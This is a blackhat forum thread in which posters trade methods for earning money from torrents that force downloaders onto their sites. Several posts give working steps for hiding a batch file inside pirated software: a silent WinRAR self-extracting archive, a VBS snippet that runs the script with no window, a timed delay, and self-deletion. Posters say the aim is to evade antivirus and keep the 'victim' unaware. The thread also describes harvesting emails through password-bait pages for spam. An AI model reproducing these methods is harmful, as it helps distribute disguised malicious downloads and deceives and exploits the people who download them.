Make $1000 with Blackhat Torrent Force Click Dragon77 Methods

Great method OP ,i doupt it can Dry up or die just add some twists to
it and you'll be making great money like this one !!

People, like people have said you can't just take this method as is and expect it to work, it's the same with any of the methods you read here. If you sit down for a couple of hours and plan out a course of action that this method could still work.

Just read the entire forum and all sorts of ideas will come to you. In fact, I've just thought of this now, it's a twist, it may work it may not, but I reckon if you put it into action it would:

I sometimes make music so I'm gonna use something like Fruity Loops (I don't use FL but lots of noobs do.)

1) Do as Dragon 77 said and get your bat and make an exe. If you can't combine the exe's with program he gave you then get of your arse and find another tut on the web.

2) Combine it with Fruity Loops exe.

3) Sign up to LOADS of torrent sites. If TPB isn't working then find something else. Anything, sign up for like 25 and stick the prog all over them.

4) Sign up for fileserver and wupload and upload it to them, then go to sites like WarezBB and stick your links all over there.

5) Now on the site that your exe points to you could try out numerous things:...

(N.B. If the password thing isn't working, think about it, you've just waited hours for the download and now someone expects you to waste more time by filling in some offer?! People aren't all retards.) Now here's what you could put on the site. Remember I've done fruity loops.

- Have two pages, on the first is an email box, tell the user that the password will be given to them after they've given you there email, bullshit and say you'll email it to them. This will more likely lead them to give you their real email. Now store all these emails in a file. Then direct them to the password. Simple.

wait, what??! I haven't earned any money. Right you are Captain Brain, but what you have is an email list full of people who are all interested in making music. I'd say that's pretty good. Now send them emails with offers, or promoting other programs you've uploaded, or a website which they can join and get stuff for. You see.

- Secondly, as with above do the email thing again. But do it with a CUSTOM content locker, like they one posted on BHW a month or so back. In short: get an email submit CPA offer, iframe it and cut out the bits you don't want, then server it up to the user. They'll hopefully put in there proper email. Then using some nifty javascript, redirect them to the password page.

Now both of those methods require work, but of course the freakin' do. Lets face it, you don't go into work IRL and ask your boss if you can just have all your wages and do no work do you? No, you don't.

So read up, like read everything, and bits will start to come together. Just remember, if you stuck on things to implement that make money, then concerntrate your efforts on getting traffic. It doesn't matter how, but once you have traffic you - generally - have $$$!!!

EDIT: The formatting went a bit hay wire.

Nice idea bro, and thanx you gave me a great idea .
i'll try this method for sure with a little twist :D:D
 
Nice tutorial mate....want to make some quick cash from $harecash using the torrent methods.....can u help me anyway?
 
having trouble with exe combining?? it wont work?? need help? READ THIS

hey guys just been looking over this method, and it has a lot of potential if you can do it correctly with your own twist ;)

i have been doing this myself for a little while and found an easier way of doing this

you dont need to download the resource hacker, or use the confusing iexpress windows app at all (added bonus your antivirus wont delete the 'suspicious' exe everytime you run it. :))

and it will also make it alot easier to get your combined exe and music video etc etc. in fact you dont even need to convert the .bat file into .exe!! :D


so follow these steps and implement them with the OP

1) make sure you have winrar
2) have your batch file and other files ready

3) open Winrar and select "add"
4) in the first tab 'browse' to where you want to save/name your archive
5) tick the box 'create SFX archive'

6) go to the 'advanced' tab and select 'SFX options...'
7) click 'create in current folder' button
8) you will notice towards bottom of window there is a setup program box
this is important. in the 'run after extraction' box, type the name of the batch file. eg 'evilblackhatmethod.bat' :P
this will run the batch file seamlessly without the user knowing, when they extract the files.

9) now click ok. back to main window. click on the files tab. and add in your batch file and whatever other files you want to upload in the torrent.

10) click ok and then compile your archive. it will appear where you told it to in step 4.


give it a test run and your batch file should automatically run :D


im going to make another post and show you how to be ultimate stealth and the user wont even know what is happening. next post
 
Last edited:
ohk, so the first post i explained makes this method a little easier, but now to explain the most truly evil blackhat twist: complete stealth!

alright so how can we make this more stealthy??
in a few ways
1) hide the batch file from the victim** i mean... downloader
2) completely hide the command promt window from opening when run :eek:
3) make a delay from running the batch, to opening URLs, etc
4) delete batch file automatically when its finished.

First
Alrite so the first step is pretty simple
you dont want the user finding some dodgy batch file and complaining that there is a virus in the download do you??
easy fix
right click, attributes and tick 'hidden'
it now becomes invisible. you will have to adjust your explorer settings to be able to view the file, as most ppl have this setting off, they wont see it.

next part to this is to change the SFX archive mode to silent when you are creating your archive. otherwise the user will be able to see the bat file being extracted.


Second
This is probably the most black hat step and is very sneaky. :)
it makes the batch file run seamlessly in the background. it will only show up in windows task manager as cmd.exe.

alrite copy this code
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "BATCHFILE.BAT" & Chr(34), 0
Set WshShell = Nothing
and paste it in notepad and save as whatever.vbs
obviously rename the batch file in the code above to your own.
now double click the new vbs file. cant see the window? but it still runs!! awesome

also you want to make this file hidden as well
and the execute after extraction will need to be replaced with *.vbs file. when compiling in winrar


Third
alright this step is good again if you dont want the victim to become suspicious. delaying the opening of your page by whatever time you desire is quite powerful. delay by 10 secs, 1 minute or 5 minutes. doesnt matter.because they cant see the command prompt running.

you will want to paste this as the first line in your batch file
Code:
PING 1.1.1.1 -n 1 -w 5000 >NUL
its just a simple ping command, in this case which will wait exactly 5000ms, or 5 seconds until the next command. edit the 5000 to whatever you want.
Id recommend maybe 30 secs to a minute before it opens your page, depending on what your doing.

next line of code will be the page code mentioned in the OP. if opening multiple pages its good to add a 2 sec pause between each one, especially for internet explorer because its so slow it cant cope with all the requests. LOL poor old internet explorer...


Fourth
and finally to delete the files when its done add this code to the end of your batch file
Code:
attrib -H YOURSCRIPT.vbs
attrib -H YOURBAT.bat

del YOURSCRIPT.vbs
del %0
the attrib command is there so that the file can be deleted from command prompt (makes it unhidden). but ive tested this and you cant actually see the files become visible again before being deleted.
and that completes this ultimate stealth method.

thanks. hope you enjoy and implement my blackhat method :)
 
Last edited:
I can understand that they get forced to your site, but how do you make money from it? Just because they get forced to your site, it doesn't mean they are going to do anything, all they are after is that torrent?
You would be suprised. I do somthing similar and include sharecash and my website with google adsence on it and a lot of people open sharecash and some times click on my adsence ads. i made 2$ in a few days on adsence with like 200 unique daily visiting. Only has been for around a few days tho
 
You can easily automate earnings with this by using a framed banner on ******, linkbucks, etc instead of affiliate links. Pay is low, but if it's a popular torrent, then it's gonna get you a decent amount
 
First one to post in 2012 ? haha. I will get into this and see whether this still works.
 
Back
Top